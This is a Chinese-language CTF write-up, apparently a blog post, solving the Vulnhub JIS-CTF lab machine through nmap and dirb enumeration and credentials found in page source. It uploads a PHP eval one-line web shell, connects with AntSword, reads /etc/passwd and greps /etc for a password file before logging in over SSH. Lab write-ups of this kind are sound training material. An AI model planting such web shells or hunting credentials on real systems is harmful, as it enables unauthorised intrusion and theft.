VulnhubJIS-CTF靶机详解

项目地址

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

修改靶机的网卡

开机时长按shift,进入此页面

image.png

选择第二个,进入

image.png

等待加载完成

image.png
image.png

选择root模式进入

将只读模式改为读写模式
mount -o remount,rw /

查看本机的网卡名称
ifconfig -a

image.png

修改默认网卡
vi /etc/network/interfaces

image.png

wq!保存退出,reboot重启即可

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知JIS-CTF的一个ip地址为192.168.47.144

扫描JIS-CTF的操作系统,端口及对应服务

nmap -A -p- 192.168.47.144

image.png

发现开放22端口和80端口

访问网站

image.png
进入了一个登录界面
但是不知道账号密码

对网站进行目录枚举

dirb http://192.168.47.144

image.png
发现存在一个robots.txt和一个flag网站
访问一下

访问http://192.168.47.144/flag

image.png

得到了第一个flag

访问http://192.168.47.144/robots.txt

image.png
对文件中的网站进行逐一访问

只在/admin_area网站里面存在一句话

image.png
存疑,感觉有问题

查看网站的源码

image.png

得到了第二个flag以及一个账号密码

回到登陆界面尝试登录

image.png
成功登录
发现可以上传文件

写一个一句话木马上传

<?php eval($_POST['cmd']); ?>

image.png
image.png
image.png
上传成功
通过robots.txt可知,文件上传到uploaded_files里面

蚁剑连接

image.png
连接成功

寻找文件

image.png

发现了一个flag.txt

打开是空的
image.png

使用命令查看

image.png
没有权限
再看看其他的

在hint.txt发现了第三个flag

image.png
文件里面提到尝试使用 technawi 用户名和密码 来查看flag.txt文件
之前扫描ip开放了22端口

尝试使用ssh进行连接

image.png
发现需要密码

在蚁剑里面寻找一下
cat /etc/passwd

image.png
x说明密码在shadow里面保存
image.png
没有权限访问被拒

尝试扫描关键字来查找密码
grep -r technawi  /etc/

image.png
扫到了,在credentials.txt文件里
image.png

得到了第四个flag以及ssh的登录账号密码

ssh连接

image.png
连接成功

直接访问html目录下的flag.txt
cat /var/www/html/flag.txt

image.png

得到最后一个flag

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值